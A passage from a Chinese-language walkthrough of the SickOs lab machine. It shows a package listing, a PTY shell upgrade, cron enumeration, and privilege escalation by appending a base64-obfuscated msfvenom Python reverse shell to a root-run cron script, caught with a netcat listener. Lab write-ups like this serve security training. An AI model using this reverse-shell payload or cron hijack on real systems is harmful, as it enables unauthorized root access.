ii resolvconf 1.63ubuntu16 name server information handler
ii rsync 3.0.9-1ubuntu1 fast, versatile, remote (and local) file-copying tool
ii rsyslog 5.8.6-1ubuntu8.6 reliable system and kernel logging daemon
ii screen 4.0.3-14ubuntu8 terminal multiplexor with VT100/ANSI terminal emulation
ii sed 4.2.1-9 The GNU sed stream editor
ii sensible-utils 0.0.6ubuntu2 Utilities for sensible alternative selection
ii sgml-base 1.26+nmu1ubuntu1 SGML infrastructure and SGML catalog file support
ii squid 3.1.19-1ubuntu3.12.04.3 dummy transitional package from squid to squid3
ii squid-langpack 20111114-1 Localized error pages for Squid
ii squid3 3.1.19-1ubuntu3.12.04.3 Full featured Web Proxy cache (HTTP proxy)
ii squid3-common 3.1.19-1ubuntu3.12.04.3 Full featured Web Proxy cache (HTTP proxy) - common files
ii ssh-import-id 2.10-0ubuntu1 securely retrieve an SSH public key and install it locally
ii ssl-cert 1.0.28ubuntu0.1 simple debconf wrapper for OpenSSL
ii strace 4.5.20-2.3ubuntu1 A system call tracer
ii sudo 1.8.3p1-1ubuntu3.4 Provide limited super user privileges to specific users
ii sysv-rc 2.88dsf-13.10ubuntu11.1 System-V-like runlevel change mechanism
ii sysvinit-utils 2.88dsf-13.10ubuntu11.1 System-V-like utilities
ii tar 1.26-4ubuntu1 GNU version of the tar archiving utility
ii tasksel 2.88ubuntu9 Tool for selecting tasks for installation on Debian systems
ii tasksel-data 2.88ubuntu9 Official tasks used for installation of Debian systems
ii tcpd 7.6.q-21 Wietse Venema's TCP wrapper utilities
ii tcpdump 4.2.1-1ubuntu2 command-line network traffic analyzer
ii telnet 0.17-36build1 The telnet client
ii time 1.7-23.1 The GNU time program for measuring cpu resource usage
ii tmux 1.6-1ubuntu1 terminal multiplexer
ii ttf-dejavu-core 2.33-2ubuntu1 Vera font family derivate with additional characters
ii tzdata 2013g-0ubuntu0.12.04 time zone and daylight-saving time data
ii ubuntu-keyring 2011.11.21.1 GnuPG keys of the Ubuntu archive
ii ubuntu-minimal 1.267.1 Minimal core of Ubuntu
ii ubuntu-standard 1.267.1 The Ubuntu standard system
ii ucf 3.0025+nmu2ubuntu1 Update Configuration File: preserve user changes to config files.
ii udev 175-0ubuntu9.4 rule-based device node and kernel event manager
ii ufw 0.31.1-1 program for managing a Netfilter firewall
ii unzip 6.0-4ubuntu2.5 De-archiver for .zip files
ii update-manager-core 1:0.156.14.11 manage release upgrades
ii update-notifier-common 0.119ubuntu8.6 Files shared between update-notifier and other packages
ii upstart 1.5-0ubuntu7.2 event-based init daemon
ii ureadahead 0.100.0-12 Read required files in advance
ii usbutils 1:005-1 Linux USB utilities
ii util-linux 2.20.1-1ubuntu3 Miscellaneous system utilities
ii uuid-runtime 2.20.1-1ubuntu3 runtime components for the Universally Unique ID library
ii vim 2:7.3.429-2ubuntu2.1 Vi IMproved - enhanced vi editor
ii vim-common 2:7.3.429-2ubuntu2.1 Vi IMproved - Common files
ii vim-runtime 2:7.3.429-2ubuntu2.1 Vi IMproved - Runtime files
ii vim-tiny 2:7.3.429-2ubuntu2.1 Vi IMproved - enhanced vi editor - compact version
ii w3m 0.5.3-5ubuntu1.1 WWW browsable pager with excellent tables/frames support
ii wget 1.13.4-2ubuntu1 retrieves files from the web
ii whiptail 0.52.11-2ubuntu10 Displays user-friendly dialog boxes from shell scripts
ii whoopsie 0.1.33 Ubuntu crash database submission daemon
ii wireless-tools 30~pre9-5ubuntu2 Tools for manipulating Linux Wireless Extensions
ii wpasupplicant 0.7.3-6ubuntu2.2 client support for WPA and WPA2 (IEEE 802.11i)
ii xauth 1:1.0.6-1 X authentication utility
ii xkb-data 2.5-1ubuntu1.3 X Keyboard Extension (XKB) configuration data
ii xml-core 0.13 XML infrastructure and XML catalog file support
ii xz-lzma 5.1.1alpha+20110809-3 XZ-format compression utilities - compatibility commands
ii xz-utils 5.1.1alpha+20110809-3 XZ-format compression utilities
ii zlib1g 1:1.2.3.4.dfsg-3ubuntu4 compression library - runtime
dpkg -l查看装了什么软件。
查看装了什么软件,可以通过这信息知道可以使用什么方式去得到一个交互式的shell。
升级交互shell
这里装了python,可以使用python得到交互式的shell。
python -c "import pty;pty.spawn('/bin/bash')"
然后获得交互式更好的shell。
python -c "import pty;pty.spawn('/bin/bash')"
www-data@SickOs:/usr/lib/cgi-bin$
自动任务提权
可以到/etc/crontab中查看自动任务,然后可以改写相应的文件,从而提权。
进入到/etc目录中,再查看相关的文件
cd /etc
ls -liah cron*
131437 -rw-r--r-- 1 root root 722 Jun 20 2012 crontab
cron.d:
total 20K
131439 drwxr-xr-x 2 root root 4.0K Dec 5 2015 .
131073 drwxr-xr-x 90 root root 4.0K Jun 7 14:32 ..
131440 -rw-r--r-- 1 root root 102 Jun 20 2012 .placeholder
132895 -rw-r--r-- 1 root root 52 Dec 5 2015 automate
132791 -rw-r--r-- 1 root root 544 Jul 2 2015 php5
cron.daily:
total 76K
131120 drwxr-xr-x 2 root root 4.0K Sep 22 2015 .
131073 drwxr-xr-x 90 root root 4.0K Jun 7 14:32 ..
131441 -rw-r--r-- 1 root root 102 Jun 20 2012 .placeholder
132647 -rwxr-xr-x 1 root root 633 Jul 24 2015 apache2
132043 -rwxr-xr-x 1 root root 219 Apr 10 2012 apport
131253 -rwxr-xr-x 1 root root 16K Nov 15 2013 apt
131619 -rwxr-xr-x 1 root root 314 Apr 19 2013 aptitude
131958 -rwxr-xr-x 1 root root 502 Mar 31 2012 bsdmainutils
131121 -rwxr-xr-x 1 root root 256 Oct 14 2013 dpkg
131477 -rwxr-xr-x 1 root root 372 Oct 5 2011 logrotate
131973 -rwxr-xr-x 1 root root 1.4K Dec 28 2012 man-db
131978 -rwxr-xr-x 1 root root 606 Aug 17 2011 mlocate
131273 -rwxr-xr-x 1 root root 249 Sep 13 2012 passwd
131640 -rwxr-xr-x 1 root root 2.4K Jul 2 2011 popularity-contest
131442 -rwxr-xr-x 1 root root 2.9K Jun 20 2012 standard
131942 -rwxr-xr-x 1 root root 214 Sep 11 2012 update-notifier-common
cron.hourly:
total 12K
131443 drwxr-xr-x 2 root root 4.0K Sep 22 2015 .
131073 drwxr-xr-x 90 root root 4.0K Jun 7 14:32 ..
131444 -rw-r--r-- 1 root root 102 Jun 20 2012 .placeholder
cron.monthly:
total 12K
131431 drwxr-xr-x 2 root root 4.0K Sep 22 2015 .
131073 drwxr-xr-x 90 root root 4.0K Jun 7 14:32 ..
131432 -rw-r--r-- 1 root root 102 Jun 20 2012 .placeholder
cron.weekly:
total 20K
131433 drwxr-xr-x 2 root root 4.0K Sep 22 2015 .
131073 drwxr-xr-x 90 root root 4.0K Jun 7 14:32 ..
131434 -rw-r--r-- 1 root root 102 Jun 20 2012 .placeholder
131620 -rwxr-xr-x 1 root root 730 Sep 14 2013 apt-xapian-index
131972 -rwxr-xr-x 1 root root 907 Dec 28 2012 man-db
然后在一个个去查看文件,看看有什么利用点,一般都是看以什么权限以自动任务的方式去执行什么文件,然后再把相应的文件修改为需要修改的形式。
查看到automate文件看到了敏感信息。
cat automate
* * * * * root /usr/bin/python /var/www/connect.py
含义就是:每分钟 以root权限 以python方式去执行 /var/www/connect.py这个文件。那思路就是修改/var/www/connect.py这个文件,从而达到提权的目的。
使用msfvenom进行生成相应的payload。
msfvenom -p cmd/unix/reverse_python lhost=192.168.52.134 lport=14447 -f raw
python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCAgICAsICAgICAgc3VicHJvY2VzcyAgICAsICAgICAgb3MgICAgICAgIDsgICAgIGhvc3Q9IjE5Mi4xNjguNTIuMTM0IiAgICAgICAgOyAgICAgcG9ydD0xNDQ0NyAgICAgICAgOyAgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICAgICwgICAgICBzb2NrZXQuU09DS19TVFJFQU0pICAgICAgICA7ICAgICBzLmNvbm5lY3QoKGhvc3QgICAgLCAgICAgIHBvcnQpKSAgICAgICAgOyAgICAgb3MuZHVwMihzLmZpbGVubygpICAgICwgICAgICAwKSAgICAgICAgOyAgICAgb3MuZHVwMihzLmZpbGVubygpICAgICwgICAgICAxKSAgICAgICAgOyAgICAgb3MuZHVwMihzLmZpbGVubygpICAgICwgICAgICAyKSAgICAgICAgOyAgICAgcD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp')[0]))"
exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCAgICAsICAgICAgc3VicHJvY2VzcyAgICAsICAgICAgb3MgICAgICAgIDsgICAgIGhvc3Q9IjE5Mi4xNjguNTIuMTM0IiAgICAgICAgOyAgICAgcG9ydD0xNDQ0NyAgICAgICAgOyAgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICAgICwgICAgICBzb2NrZXQuU09DS19TVFJFQU0pICAgICAgICA7ICAgICBzLmNvbm5lY3QoKGhvc3QgICAgLCAgICAgIHBvcnQpKSAgICAgICAgOyAgICAgb3MuZHVwMihzLmZpbGVubygpICAgICwgICAgICAwKSAgICAgICAgOyAgICAgb3MuZHVwMihzLmZpbGVubygpICAgICwgICAgICAxKSAgICAgICAgOyAgICAgb3MuZHVwMihzLmZpbGVubygpICAgICwgICAgICAyKSAgICAgICAgOyAgICAgcD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp')[0]))
把最后这个追加到python文件中就好。
先cd到/var/www文件夹中,然后再 vi connect.py,点击o再粘贴上面最后一段的内容,再Esc,:wq回车就可以了。
这样就写入了。
cat connect.py
#!/usr/bin/python
exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCAgICAsICAgICAgc3VicHJvY2VzcyAgICAsICAgICAgb3MgICAgICAgIDsgICAgIGhvc3Q9IjE5Mi4xNjguNTIuMTM0IiAgICAgICAgOyAgICAgcG9ydD0xNDQ0NyAgICAgICAgOyAgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICAgICwgICAgICBzb2NrZXQuU09DS19TVFJFQU0pICAgICAgICA7ICAgICBzLmNvbm5lY3QoKGhvc3QgICAgLCAgICAgIHBvcnQpKSAgICAgICAgOyAgICAgb3MuZHVwMihzLmZpbGVubygpICAgICwgICAgICAwKSAgICAgICAgOyAgICAgb3MuZHVwMihzLmZpbGVubygpICAgICwgICAgICAxKSAgICAgICAgOyAgICAgb3MuZHVwMihzLmZpbGVubygpICAgICwgICAgICAyKSAgICAgICAgOyAgICAgcD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp')[0]))
print "I Try to connect things very frequently\n"
print "You may want to try my services"
开启监听
nc -lvnp 14447
listening on [any] 14447 ...
connect to [192.168.52.134] from (UNKNOWN) [192.168.52.142] 46898
ls
a0216ea4d51874464078c618298b1367.txt
whoami
root
升级为交互式shell
python -c "import pty;pty.spawn('/bin/bash')"
到这第二种解法也结束了。